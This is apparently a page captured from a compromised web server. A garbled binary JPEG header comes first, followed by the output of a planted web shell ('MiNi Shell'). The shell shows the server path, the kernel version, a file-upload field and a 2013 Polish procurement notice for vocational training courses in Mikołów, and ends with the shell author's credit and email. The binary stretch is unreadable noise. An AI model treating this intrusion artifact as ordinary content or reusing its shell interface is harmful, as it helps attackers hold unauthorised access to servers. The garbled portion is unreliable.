JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130918/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130918/378828-N-2013.html

<p class="kh_header"><b>Mikołów: Usługa szkolenia zawodowego dla uczestników projektu systemowego Zakontraktuj swoją przyszłość współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 POKL</b><br>
<b>Numer ogłoszenia: 378828 - 2013; data zamieszczenia: 18.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 2, 43-190 Mikołów, woj. śląskie, tel. 32 3242666, faks 32 3242694.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkolenia zawodowego dla uczestników projektu systemowego Zakontraktuj swoją przyszłość współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 POKL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Usługa szkolenia zawodowego dla uczestników projektu systemowego Zakontraktuj swoją przyszłość współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 POKL

Przedmiot zamówienia obejmuje:
1.	Przeprowadzenie szkoleń obejmujących teorię i praktykę z zakresu:     Zad.	Nazwa szkolenia	                                        min. L-ba godz.l-ba osób
1	Opiekunka osób starszych, niepełnosprawnych, dzieci 	70	4
2	Kierowca wózków jezdniowych z wymianą butli gazowych	70	4
3	Obsługa kasy fiskalnej + obsługa komputera	          40	4
4	Operator koparko-ładowarki, koparki, ładowarki	         216	2
5	Operator koparki	                                                        20	1
6	Mała firma	                                                         90	5
7	Spawacz MAG+TIG                                                	270	2
8	Magazynier	                                                        60	1
9	Przepalacz gazowy                                               	45	1
10	Wizaż i stylizacja paznokci	                                   77	4
11	Kwalifikacja wstępna przyspieszona - przewóz rzeczy	140	2
12	Prawo jazdy - C	                                                         50	2
13	Prawo jazdy - B	                                                         60	1
14	Animator zabaw dziecięcych                                     	6	1
15	Obsługa komputera MS Office - kurs podstawowy oraz średnio zaawansowany	                                                                 40	7
16	Florysta	                                                                   96	1

1.1	Wykonawca powinien w szczególności zapewnić uczestnikom: salę wykładową posiadająca dostęp do światła dziennego, wyposażoną w stoły i krzesła z oparciami; odpowiednie materiały dydaktyczne, narzędzia, sprzęt i ubrania ochronne niezbędne do przeprowadzenia szkolenia a także ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku z kursem oraz w drodze do i z miejsca szkolenia,  catering dla uczestników wraz z utworzenia listy odbioru cateringu
1.2	Szkolenia powinny być prowadzone w formie zajęć teoretycznych i praktycznych przez wykwalifikowane osoby posiadające odpowiednie wykształcenie , wiedzę oraz doświadczenie niezbędne do przeprowadzenia szkolenia.
1.3	Miejsce i sprzęt niezbędny do odbycia szkolenia muszą spełniać wszelkie wymogi bezpieczeństwa przewidziane przepisami BHP i P/POŻ
1.4	W szkoleniu określonym w zadaniu 4 moduły ładowarki i koparki mają stanowić uzupełnienie szkolenia operatora koparko-ładowarki.
1.5	Realizacja zamówienia winna nastąpić w Mikołowie lub w miejscu, do którego dojazd komunikacją miejską nie zajmuje więcej niż 40 minut.
1.6	W związku z tym, iż ci sami klienci będą korzystać z różnych szkoleń następujące szkolenia nie mogą być zorganizowane w tym samym terminie:
1 nie może się pokrywać z 3 i 10;
2 nie może pokrywać się z 10;
1, 3, 6, 10 nie może pokrywać się z 15;
2 nie może pokrywać się z 7 i 15;
5 nie może pokrywać się z 11 i 12;
6 nie może pokrywać się z 14;
8 nie może pokrywać się z 9;
15 nie może pokrywać się z 16.
Szkolenia nr 4, 5, 2, 7, 8, 9, 11 Wykonawca winien zorganizować w godzinach pomiędzy 12.00 a 18.00. 
Kursy odbywać się będą zgodnie z harmonogramem przedstawionym przez Zamawiającego. 
Terminy realizacji poszczególnych zajęć, jak również ilość uczestników mogą ulec zmianie 
z przyczyn niezależnych od Zamawiającego.
Obowiązki Wykonawcy:
1.	zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.)
2.	prowadzenie dokumentacji w zakresie ww. działania
listy obecności uczestników szkolenia,
dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych,
rejestr wydanych zaświadczeń potwierdzających ukończenie szkolenia.
3.	współpraca z koordynatorem projektu i z innymi pracownikami zatrudnionymi w projekcie,
4.	prowadzenie kursu na podstawie harmonogramem ustalonego z koordynatorem projektu 
po podpisaniu umowy,
5.	uzyskanie niezbędnych zezwoleń oraz ubezpieczenia uczestników (od następstw nieszczęśliwych wypadków),
6.	skierowanie na badania lekarskie,
7.	zapewnienie uczestnikom:
warunków w oparciu o zasady BHP, sale dydaktyczne powinny być wyposażone stosownie 
do potrzeb grupy słuchaczy, tj. w miejsca siedzące, ławki/stoliki, sprzęt audiowizualny, tablice szkolne i magnetyczne,
niezbędnych materiałów, narzędzi, maszyn i produktów koniecznych do prawidłowego przeprowadzenia kursów, 
materiałów dydaktycznych i biurowych koniecznych do przeprowadzenia zajęć - odbiór materiałów dydaktycznych i biurowych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczenia,
8.	 przygotowywanie po zakończonym kursie protokołu odbioru wykonywanej pracy

Wykonawca, pod rygorem utraty prawa do zapłaty za szkolenie, zobowiązany jest do niezwłocznego poinformowania Zamawiającego o:
	- niezgłoszeniu się uczestników na szkolenie,
	- przerwaniu szkolenia lub rezygnacji z uczestnictwa oraz każdorazowej nieobecności uczestników,
	- innych sytuacjach, które mają wpływ na realizację programu szkolenia  i umowy.

Zamawiający dopuszcza utworzenie miejsc dla uczestników wskazanych w projekcie do innej grupy szkoleniowej wskazanej przez Wykonawcę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.30.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mikolow.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Mikołowie
ul. Kolejowa 2, 
43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2013 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Mikołowie
ul. Kolejowa 2, 
43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowy przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com